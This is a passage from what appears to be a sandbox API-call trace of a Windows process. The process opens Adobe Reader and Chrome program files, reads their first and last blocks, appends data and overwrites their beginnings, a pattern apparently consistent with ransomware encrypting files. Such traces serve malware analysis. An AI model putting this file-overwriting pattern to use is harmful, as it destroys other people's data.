ReleaseMutex (hMutex=0x168) returned 1 [0115.477] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CP1253.TXT", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0115.477] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CP1253.TXT", cchWideChar=10, lpMultiByteStr=0x1f732cc, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CP1253.TXT", lpUsedDefaultChar=0x0) returned 10 [0115.477] ReadFile (in: hFile=0x20c, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0115.485] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x1414 [0115.485] ReadFile (in: hFile=0x20c, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0115.489] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x1414 [0115.489] WriteFile (in: hFile=0x20c, lpBuffer=0x1e943a8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e943a8*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0115.489] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0115.489] WriteFile (in: hFile=0x20c, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0115.489] CloseHandle (hObject=0x20c) returned 1 [0115.490] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP936.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp936.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0115.490] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0115.490] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xccee7 [0115.491] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0115.491] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0115.491] ReleaseMutex (hMutex=0x168) returned 1 [0115.491] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CP936.TXT", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0115.491] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CP936.TXT", cchWideChar=9, lpMultiByteStr=0x1f7352c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CP936.TXT", lpUsedDefaultChar=0x0) returned 9 [0115.491] ReadFile (in: hFile=0x20c, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x311f278*=0xf000, lpOverlapped=0x0) returned 1 [0115.639] ReadFile (in: hFile=0x20c, lpBuffer=0x288f948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0115.642] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0xcbee7 [0115.642] ReadFile (in: hFile=0x20c, lpBuffer=0x1ea99e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea99e8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0115.900] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0xcbee7 [0115.901] WriteFile (in: hFile=0x20c, lpBuffer=0x2663838*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0115.902] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0115.902] WriteFile (in: hFile=0x20c, lpBuffer=0x289e978*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x289e978*, lpNumberOfBytesWritten=0x311f28c*=0xf000, lpOverlapped=0x0) returned 1 [0115.902] WriteFile (in: hFile=0x20c, lpBuffer=0x289e978*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x289e978*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0115.902] CloseHandle (hObject=0x20c) returned 1 [0115.903] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1033.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1033.mst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0115.903] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1033.mst", nBufferLength=0x104, lpBuffer=0x311f694, lpFilePart=0x311f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1033.mst", lpFilePart=0x311f690*="1033.mst") returned 0x64 [0115.903] GetLastError () returned 0x5 [0115.903] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x311f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i̑폈H̑퐔H̑L̑꧰Ƿ\x01") returned 0x13 [0115.903] LocalFree (hMem=0x69e2b0) returned 0x0 [0115.903] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x311d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0115.903] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x311f894) [0115.904] RtlUnwind (TargetFrame=0x311f8fc, TargetIp=0x406ffc, ExceptionRecord=0x311f378, ReturnValue=0x0) [0115.904] RtlUnwind (TargetFrame=0x311f920, TargetIp=0x407184, ExceptionRecord=0x311f378, ReturnValue=0x0) [0115.904] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1033.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1033.mst")) returned 0x21 [0115.905] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1043.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1043.mst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0115.905] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1043.mst", nBufferLength=0x104, lpBuffer=0x311f694, lpFilePart=0x311f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1043.mst", lpFilePart=0x311f690*="1043.mst") returned 0x64 [0115.906] GetLastError () returned 0x5 [0115.906] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x311f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i̑폈H̑퐔H̑L̑꧰Ƿ\x01") returned 0x13 [0115.906] LocalFree (hMem=0x69e2b0) returned 0x0 [0115.906] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x311d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0115.906] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x311f894) [0115.906] RtlUnwind (TargetFrame=0x311f8fc, TargetIp=0x406ffc, ExceptionRecord=0x311f378, ReturnValue=0x0) [0115.906] RtlUnwind (TargetFrame=0x311f920, TargetIp=0x407184, ExceptionRecord=0x311f378, ReturnValue=0x0) [0115.906] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1043.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1043.mst")) returned 0x21 [0115.907] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1053.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1053.mst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0115.907] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1053.mst", nBufferLength=0x104, lpBuffer=0x311f694, lpFilePart=0x311f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1053.mst", lpFilePart=0x311f690*="1053.mst") returned 0x64 [0115.907] GetLastError () returned 0x5 [0115.907] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x311f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i̑폈H̑퐔H̑L̑꧰Ƿ\x01") returned 0x13 [0115.907] LocalFree (hMem=0x69e2b0) returned 0x0 [0115.907] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x311d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0115.907] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x311f894) [0115.908] RtlUnwind (TargetFrame=0x311f8fc, TargetIp=0x406ffc, ExceptionRecord=0x311f378, ReturnValue=0x0) [0115.908] RtlUnwind (TargetFrame=0x311f920, TargetIp=0x407184, ExceptionRecord=0x311f378, ReturnValue=0x0) [0115.908] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1053.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1053.mst")) returned 0x21 [0115.908] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\Data1.cab" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\data1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0115.923] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\Data1.cab", nBufferLength=0x104, lpBuffer=0x311f694, lpFilePart=0x311f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\Data1.cab", lpFilePart=0x311f690*="Data1.cab") returned 0x65 [0115.923] GetLastError () returned 0x5 [0115.923] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x311f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i̑폈H̑퐔H̑L̑꧰Ƿ\x01") returned 0x13 [0115.923] LocalFree (hMem=0x69e2b0) returned 0x0 [0115.923] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x311d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0115.923] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x311f894) [0115.923] RtlUnwind (TargetFrame=0x311f8fc, TargetIp=0x406ffc, ExceptionRecord=0x311f378, ReturnValue=0x0) [0115.923] RtlUnwind (TargetFrame=0x311f920, TargetIp=0x407184, ExceptionRecord=0x311f378, ReturnValue=0x0) [0115.923] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\Data1.cab" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\data1.cab")) returned 0x21 [0115.924] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome.dll.sig" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\chrome.dll.sig"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0115.925] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0115.925] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x57f [0115.925] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0115.925] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0115.925] ReleaseMutex (hMutex=0x168) returned 1 [0115.925] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="chrome.dll.sig", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0115.925] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="chrome.dll.sig", cchWideChar=14, lpMultiByteStr=0x1f733cc, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="chrome.dll.sig", lpUsedDefaultChar=0x0) returned 14 [0115.925] ReadFile (in: hFile=0x1dc, lpBuffer=0x1eff4b8, nNumberOfBytesToRead=0x57f, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesRead=0x311f2bc*=0x57f, lpOverlapped=0x0) returned 1 [0115.956] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0115.956] WriteFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0xb07, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x311f2d0*=0xb07, lpOverlapped=0x0) returned 1 [0115.956] CloseHandle (hObject=0x1dc) returned 1 [0115.956] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps\\gmail.crx" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\default_apps\\gmail.crx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0115.959] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0115.959] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x5de8 [0115.959] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0115.959] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0115.959] ReleaseMutex (hMutex=0x168) returned 1 [0115.959] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="gmail.crx", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0115.959] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="gmail.crx", cchWideChar=9, lpMultiByteStr=0x1f735cc, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gmail.crx", lpUsedDefaultChar=0x0) returned 9 [0115.959] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0116.499] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x4de8 [0116.499] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0116.509] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x4de8 [0116.509] WriteFile (in: hFile=0x1dc, lpBuffer=0x1ea3958*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0116.511] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0116.511] WriteFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0116.511] CloseHandle (hObject=0x1dc) returned 1 [0116.511] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\bg.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\bg.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0116.519] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0116.519] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x84ca7 [0116.524] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0116.524] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0116.524] ReleaseMutex (hMutex=0x168) returned 1 [0116.524] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bg.pak", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0116.524] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bg.pak", cchWideChar=6, lpMultiByteStr=0x1f7ac84, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bg.pak", lpUsedDefaultChar=0x0) returned 6 [0116.524] ReadFile (in: hFile=0x1dc, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x311f278*=0xf000, lpOverlapped=0x0) returned 1 [0116.616] ReadFile (in: hFile=0x1dc, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0116.621] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x83ca7 [0116.621] ReadFile (in: hFile=0x1dc, lpBuffer=0x2866c88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2866c88*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0116.635] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x83ca7 [0116.636] WriteFile (in: hFile=0x1dc, lpBuffer=0x2866c88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2866c88*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0116.637] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0116.637] WriteFile (in: hFile=0x1dc, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x311f28c*=0xf000, lpOverlapped=0x0) returned 1 [0116.638] WriteFile (in: hFile=0x1dc, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0116.638] CloseHandle (hObject=0x1dc) returned 1 [0116.638] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\en-US.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\en-us.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0116.642] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0116.643] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x42442 [0116.643] SetFilePointer (in: hFile=0x208, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0116.643] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0116.643] ReleaseMutex (hMutex=0x168) returned 1 [0116.643] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="en-US.pak", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0116.643] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="en-US.pak", cchWideChar=9, lpMultiByteStr=0x1f733cc, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="en-US.pak", lpUsedDefaultChar=0x0) returned 9 [0116.643] ReadFile (in: hFile=0x208, lpBuffer=0x2882db8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x311f278*=0x8000, lpOverlapped=0x0) returned 1 [0116.645] SetFilePointer (in: hFile=0x208, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x41442 [0116.646] ReadFile (in: hFile=0x208, lpBuffer=0x1ea7988, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: 